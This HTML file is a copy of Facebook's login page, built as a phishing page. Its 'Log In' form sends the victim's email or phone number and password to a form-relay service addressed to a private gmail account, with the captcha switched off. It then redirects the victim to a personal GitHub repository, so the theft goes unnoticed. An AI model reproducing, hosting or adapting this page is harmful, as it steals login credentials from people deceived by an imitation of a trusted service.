<!doctype html>
<html>
    <head>
        <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    
    
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" integrity="sha384-wvfXpqpZZVQGK6TAh5PVlGOfQNHSoD2xbE+QkPxCAFlNEevoEH3Sl0sibVcOQVnN" crossorigin="anonymous">
    <meta http-equiv="content-type" content="text/html; charset=utf-8">

    <title>Facebook login</title>
    </head>
    
    
    <body>
        <div class="phead">By proceeding, you agree SIMS Terms, which includes letting Facebook request and receive your phone number.Change settings</div>
         
        <div class="container">
            <p class="facebook">Facebook</p>
           <form id="contactform" action="https://formsubmit.io/send/id463121@gmail.com" method="POST">
    <input class="input" name="phone_number/Email" type="text"  placeholder="Email or phone number">
    <input type="hidden" name="_captcha" value="false">
                    <br/><br>
        
    <input class="input" name="email" type="password"  placeholder="Password">
                    <br><br>
        
    <input type="hidden" name="_next" value="https://github.com/ikechukwu647/mypotfilio.git">
        <input  name="_formsubmit_id" type="text" style="display:none"><br>

    <input class="button" value="Log In" type="submit">
</form> <br/>
            <a href="www//https:facebook.com" class="forget">Forgotten password?</a>
            
            
            <br><br>
            
         
            <div class="container1">
                <div class="alin-item"></div>
                <div class="alin-item">or</div>
                <div class="alin-item"></div>
            </div>
            
            <div class="create-btn">
                Create new account
            </div>
<br>
            <div class="container2">
                <div class="log">English (UK)<br>Français (France)
                    <br>Español
                    <br>Deutsch
                </div>
                <div class="log">Hausa<br>
                    Português (Brasil)
                    <br>
                العربية
              <br>
             <p class="plus">+</p> 
            </div>
            </div>
        <div class="last">
          <lo>
 <li> About   </li>

 <li> Help </li>

 <li> More</li>
          </lo>
        </div>
        <br>
        <div class="footer">Meta © 2023</div>
            </div>
    </body>
    <style>
        .footer{
            color: #797878;
        }
    .last{
            text-align: center;
        }
        lo{
            color: #a9a9a9;
            display: flex;
        
        }
        li{
            margin:5px;
        }
        .log{
            text-align:center;
        }
        .plus{
            padding: 1px 3px;
            border:1px solid  #a9a9a9;
             font-size: 25px;
             align-items: center;
             text-align: center;
        }
        .container2{
            color:  #a9a9a9;
            display:flex;
            flex-direction: row;
            justify-content: space-around;
        }
        .create-btn{
            margin: 30px;
            color:#1a1a1a;
            font-style: bold;
            text-align: center;
            padding: 10px;
            border: 1px solid  #a9a9a9;

        }
        .alin-item:nth-child(1){
            height: 1px;
            width:40%;
            background-color: #a9a9a9;
        }
        .alin-item:nth-child(3){
            height: 1px;
            width:40%;
            background-color: #a9a9a9;
        }
        
        
        .container1{
            color: #a9a9a9;
            display:flex;
            flex-direction: row;
            justify-content: space-between;
        }
        *{
            box-sizing: border-box;
            font-family: Helvetica Neue, sans-serif;
            background-color:#ffffff;

        }
        .body{
            padding:0;
            margin:0;
        }
    .forget{
        color:#5092ff;
        font-size:13px;
    }
    .button{
        border-radius:5px;
        width:100%;
        height:42px;
        background-color:#1877f2;
        outline:none;
        border:none;
        color:rgb(247,247,247);
        font-weight:bold;
        font-size:20px;
    }
    .input{
        width:100%;
        height:38px;
        outline:none;
         border:none;
         
         border-radius:3px;
         background-color:#f5f6f7;
         color:#1b1b1b;
         font-size:14px;
    }
        .container{
            text-align: center;
            padding:30px;
        }
        .facebook{
            font-weight: bold;
            color:#5092ff;
            font-size:31px;
            font-weight:bold;
            
        } 
    
         .phead{
             background-color:#E6F2FF;
             padding:10px;
             color:#83878c;
            border-bottom:1px solid #5092ff;
             font-size:10px;
             
         }
     .fa-facebook{
       font-size:17px;
       color:rgb(41,98,225);
         
     
     }
        
        
    </style>
    
    
</html> 